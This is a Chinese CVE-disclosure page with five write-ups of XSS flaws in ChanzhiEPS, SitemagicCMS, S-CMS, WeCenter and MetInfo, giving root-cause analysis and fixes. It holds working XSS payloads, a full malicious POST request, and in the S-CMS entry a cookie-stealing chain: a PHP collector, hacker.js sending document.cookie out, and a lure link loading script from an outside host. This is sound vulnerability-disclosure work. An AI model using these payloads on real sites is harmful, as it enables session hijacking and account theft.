CVE中文申请站

CVE-2019-12857:蝉知门户系统7.0.1开源版存在XSS漏洞

一、漏洞摘要

漏洞名称: 蝉知门户系统7.0.1开源版存在XSS漏洞
上报日期: 2019-05-30
漏洞发现者: fucsec
产品首页: https://www.chanzhi.org/
软件链接: https://www.chanzhi.org/download/chanzhi7.0.1-332.html
版本: V7.0.1
CVE编号: CVE-2019-12857


二、漏洞概述

蝉知门户系统(chanzhiEPS)是一款开源免费的企业门户系统,企业建站系统,CMS系统。它专为企业营销设计,功能专业全面,内置了文章发布、会员管理、论坛评论、产品展示、在线销售、客服跟踪等功能。
在chanzhiEPS.7.0.1chanzhiepssystemframeworkbase router.class.php中的第1764到1802行public function mergeParams函数检查了URL中的参数
1.png
跟进$ValueRule变量及$filter->default->paramValue规则,在D:chanzhiEPS.7.0.1chanzhiepssystemconfigfilter.php中的38行代码定义了过滤规则,如下图
2.png
我们搜索关键词“web”后,在标题和内容都进行了搜索,审查元素,跟进words值。在chanzhiEPS.7.0.1chanzhiepssystemmodulesearchcontrol.php中的23行public function index函数对传递过来的值进行搜索,并将结果进行显示。
这段代码很有意思,需仔细分析
3.png
4.png
如果传递过来的word不为空,则对words进行urldecode,貌似找到了绕过的方法,我们在搜索框中先将payload进行URL编码测试
Payload:
1' onmouseover=prompt(1) bad='-1
前面我们分析了系统在传递参数的时候会进行urldecode操作,会保证测试效果,我们先对payload进行URL编码
urlencode:1%27%20onmouseover%3Dprompt%281%29%20fucsec%3D%27-1
点击搜索后,服务依然响应BAD Request!
5.png
继续分析,终于在chanzhiEPS.7.0.1chanzhiepssystemframeworkbase router.class.php中的第1764到1802行public function mergeParams函数中的第1792行找到了答案。如下
6.png
对传递过来的参数再次进行了urldecode,相当于在输出前进行了两次urldecode。

三、利用方法

我们调整我们的payload,对payload进行两次urlencode。如下
1%2527%2520onmouseover%253Dprompt%25281%2529%2520fucsec%253D%2527-1
点击搜索,如下成功完成系统的弹框。
漏洞总结及修复建议:
系统进行了多次过滤也采取了很多安全措施
7.png
我们全文搜索一下处理XSS的函数就知晓了,一般多用htmlspecialchars来转义XSS输出。全局搜索使用到该函数的地方有121处,但遗憾的是没用到跟搜索相关的Search模块下,Search模块下的文件均未出现htmlspecialchars函数。
8.png
修复建议:将htmlspecialchars函数应用在Serach模块及其它需要输出内容的模块。

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/245/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12857
exploit-db:发布中

CVE-2019-10238:SitemagicCMS上传参数存在反射型XSS

一、漏洞摘要

漏洞名称: SitemagicCMS上传参数存在反射型XSS
上报日期: 2019-03-23
漏洞发现者: F1y1nth3sky
产品首页: https://github.com/Jemt/SitemagicCMS
软件链接: https://github.com/Jemt/SitemagicCMS
版本: v4.4
CVE编号: CVE-2019-10238


二、漏洞概述

上传处filename参数存在XSS
/SitemagicCMS/index.php?SMFilesUpload&SMExecMode=Dedicated&SMExt=SMFiles&SMFilesUploadPath=files/images&SMTemplateType=Basic
extensions/SMFiles/FrmUpload.class.php:对参数没有进行过滤
11.png


三、利用代码

filename="xss<img src="/zh_CN/htmledition/images/transparent.png" lazysrc=1 onerror=alert(1)>"

22.png

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/175/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10238
exploit-db:发布中

CVE-2019-9925:S-CMS学校建站系统PHP版V1.0多处反射型XSS

一、漏洞摘要

漏洞名称: S-CMS学校建站系统PHP版V1.0多处反射型XSS
上报日期: 2019-03-21
漏洞发现者: Liu Ze Yan
产品首页: https://www.s-cms.cn/download.html?code=php
软件链接: https://www.s-cms.cn/download.html?code=php
版本: PHP v1.0
CVE编号: CVE-2019-9925


二、漏洞概述

以下目录均有参数可以进行反射性xss攻击
1.png

原因在于输入参数的地方没有进行因该有的过滤
2.png
3.png
4.png

因此我们可以构造简单的测试payload
5.png
可以看到已经能够执行了xss语句

三、利用代码

首先编写收集用的代码

<?php 
$cookie = $_GET['q']; 
var_dump($cookie); 
$myFile = "cookie.txt"; 
file_put_contents($myFile, $cookie); 
?> 

接着写发送请求的hacker.js,代码如下:

var img = new Image();
img.src = "http://127.0.0.1/hack.php?q="+document.cookie;
document.body.append(img);

在这里做的是本地测试,所以使用127.0.0.1的ip

模拟欺骗链接

<a href=" http://localhost/4.edu.php/?S_id=%3Cscript+
src%3Dhttp%3A%2F%2Fhacker.qq.com%2Fhacker.js%3E%3C%2Fscript%3E&commend=
all&ssid=s5-e&search_type=item&atype=&filterFineness=&rr=
1&pcat=food2011&style=grid&cat=">点击就送998</a>

当已登录用户点击之后,则可以实现在服务器上获取其登录cookies,甚至用户名密码。
6.png

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/163/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9925
exploit-db:发布中

CVE-2018-19083:WeCenter3.2.0-3.2.2储存型XSS

一、漏洞摘要

漏洞名称: WeCenter3.2.0-3.2.2储存型XSS
上报日期: 2018-11-02
漏洞发现者: Smi1e
产品首页: http://wenda.wecenter.com/
软件链接: http://wenda.wecenter.com/
版本: 3.2.0-3.2.2
CVE编号: CVE-2018-19083


二、漏洞概述

漏洞存在于WeCenter3.2.0/views/default/question/index.tpl.html中的第644,645,664,665行。
1.png
用户发布的问题标题经过htmlspecialchars_decode函数输出到了JS里,此处应该用htmlspecialchars() ,导致XSS漏洞。
2.png
当输入<script>alert(1)</script>后在浏览器渲染的时候,第一个</script>标签闭合了JS开头的<script>标签,从而从单引号中逃逸了出来,导致成功执行了JS代码。然后逃逸出来的单引号又闭合了下一个<script>前面的的单引号,从而导致弹窗了3次alert(1)。

三、利用代码

exp代码如下:

问题标题处输入:<script>alert(1)</script>
post数据包如下:
POST /WeCenter322/?/publish/ajax/publish_question/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 233
Cookie: lrs__Session=vvoutttrb79pa5fqgscqpdk0o2; lrs__user_login=6mdKXpYsXXBcYDxSW5FvDkK%2B%2FYr%2BIzrQEEpWa87z3kLrCBkGsZQpEnz%2FOiwHyE%2Fu5Xhn%2BqeLcDU3TT9%2Fppl1yXZclxcyrtHud9rR8EgfFyszWNY3cLkktjGsmh8Ae%2BiH
DNT: 1
Connection: close

post_hash=9e862174d7447bf2e73d591ee2090d42&attach_access_key=e91fee78235153fdff2f86281e8593e5&question_id=&ask_user_id=&category_id=1&question_content=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&question_detail=&_post_type=ajax

3.png

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/76/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19083
exploit-db:发布中

CVE-2018-18296:Metinfo-6.1.2版本存在XSS漏洞

一、漏洞摘要

漏洞名称: Metinfo-6.1.2版本存在XSS漏洞
上报日期: 2018-10-12
漏洞发现者: 踏月留香
产品首页: https://www.metinfo.cn/
软件链接: https://www.metinfo.cn/upload/file/MetInfo6.1.2.zip
版本: 6.1.2
CVE编号: CVE-2018-18296


二、漏洞概述

漏洞存在于MetInfo6.1.2/admin/index.php页面,由于参数bigclass过滤不严,导致XSS漏洞
本地搭建网站,首先登录网站后台:http://172.16.141.134/MetInfo6.1.2/admin/,登录成功后,构造payload:
http://172.16.141.134/MetInfo6.1.2/admin/index.php?lang=cn&anyid=25&n=column&c=index&a=doadd&bigclass=1%22%3e%3cscript%3ealert(/xss/)%3c%2fscript%3e即可执行跨站脚本
xss.png

三、利用代码

exp代码如下:

http://127.0.0.1/MetInfo6.1.2/admin/index.php?lang=cn&anyid=25&n=column&c=index&a=doadd&bigclass=1%22%3e%3cscript%3ealert(/xss/)%3c%2fscript%3e


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/52/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18296
exploit-db:发布中